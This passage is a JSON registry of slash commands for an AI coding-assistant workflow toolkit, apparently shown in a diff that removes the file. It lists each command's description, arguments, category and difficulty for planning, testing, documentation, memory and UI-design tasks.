"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\\"",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\\"",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
},
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
]


@@ -1,914 +0,0 @@
{
"cli": {
"_root": [
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
}
]
},
"general": {
"_root": [
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
}
]
},
"issue": {
"_root": [
{
"name": "discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3]",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
}
]
},
"memory": {
"_root": [
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
"arguments": "[skill_name] \\\"task intent description\\\"",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
"arguments": "[--tool gemini|qwen] \\\"task context description\\\"",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
}
]
},
"task": {
"_root": [
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
"arguments": "\\\"task title\\\"",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
}
]
},
"workflow": {
"_root": [
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\\"",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\\"",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
}
],
"brainstorm": [
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
}
],
"session": [
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
